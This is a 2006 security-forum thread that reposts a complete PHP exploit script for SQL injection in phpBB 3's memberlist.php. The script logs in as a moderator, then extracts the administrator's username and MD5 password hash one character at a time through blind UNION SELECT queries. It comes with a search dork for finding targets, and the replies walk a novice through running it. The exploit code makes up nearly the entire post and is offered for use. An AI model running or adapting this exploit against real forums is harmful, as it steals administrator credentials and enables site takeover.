|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
PHPBB 3 Memberlist.PHP SQL Injection Vulnerability |
|
Posted: Sat Jul 15, 2006 12:36 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Original info:
http://www.securityfocus.com/bid/18969/exploit
http://www.securityfocus.com/data/vulnerabilities/exploits/phpBB3MemberlistSQLInjUuly132006.php
Code: |
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";
/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo " -T[prefix] specify a table prefix different from default (phpbb_)\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -u[number]: specify a user id other than 2 (admin)\n";
echo " -x: disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
$user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
$discl=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
|
Not tested ... |
|
|
|
|
|
|
|
|
Posted: Sun Jul 30, 2006 6:00 pm |
|
|
Joez |
Beginner |
|
|
Joined: Jul 30, 2006 |
Posts: 2 |
|
|
|
|
|
|
|
I get "Can't exec /usr/bin/php at hack.pl line 1" once I execute it. Help is appreciated. |
|
|
|
|
Posted: Sun Jul 30, 2006 8:51 pm |
|
|
zer0-c00l |
Advanced user |
|
|
Joined: Jun 25, 2004 |
Posts: 72 |
Location: BRAZIL! |
|
|
|
|
|
|
Joez wrote: | I get "Can't exec /usr/bin/php at hack.pl line 1" once I execute it. Help is appreciated. |
LOL
it isn't perl. |
|
|
|
|
Posted: Sun Jul 30, 2006 9:47 pm |
|
|
Joez |
Beginner |
|
|
Joined: Jul 30, 2006 |
Posts: 2 |
|
|
|
|
|
|
|
So how do I execute it? Do I need to user Active perl? Or do I just upload it on my server? |
|
|
|
|
Posted: Sun Jul 30, 2006 11:38 pm |
|
|
WaterBird |
Active user |
|
|
Joined: May 16, 2005 |
Posts: 37 |
|
|
|
|
|
|
|
Joez wrote: | So how do I execute it? Do I need to user Active perl? Or do I just upload it on my server? |
Use linux.
In console.
jed ./test
copy all script
save script
chmod u+x ./test
./test
But.. "you need a global moderator account with "simple moderator" role" thats what bothers me Thx waraxe for posting. |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|